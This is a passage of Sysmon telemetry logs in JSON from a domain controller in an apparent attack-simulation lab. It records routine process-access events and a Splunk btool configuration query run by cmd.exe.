\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-0010E1100500}\r\nTargetProcessId: 5024\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-0010E1100500}","TargetProcessId":"5024","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.520\r\nProcessGuid: {A837DB8D-0238-5F25-0000-00109C110500}\r\nProcessId: 4996\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0238-5F25-0000-0010E1100500}\r\nParentProcessId: 5024\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.520","ProcessGuid":"{A837DB8D-0238-5F25-0000-00109C110500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0238-5F25-0000-0010E1100500}","ParentProcessId":"5024","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-0238-5F25-0000-0010E1100500}\r\nSourceProcessId: 5024\r\nSourceThreadId: 4988\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109C110500}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-0238-5F25-0000-0010E1100500}","SourceProcessId":"5024","SourceThreadId":"4988","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109C110500}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109C110500}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109C110500}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
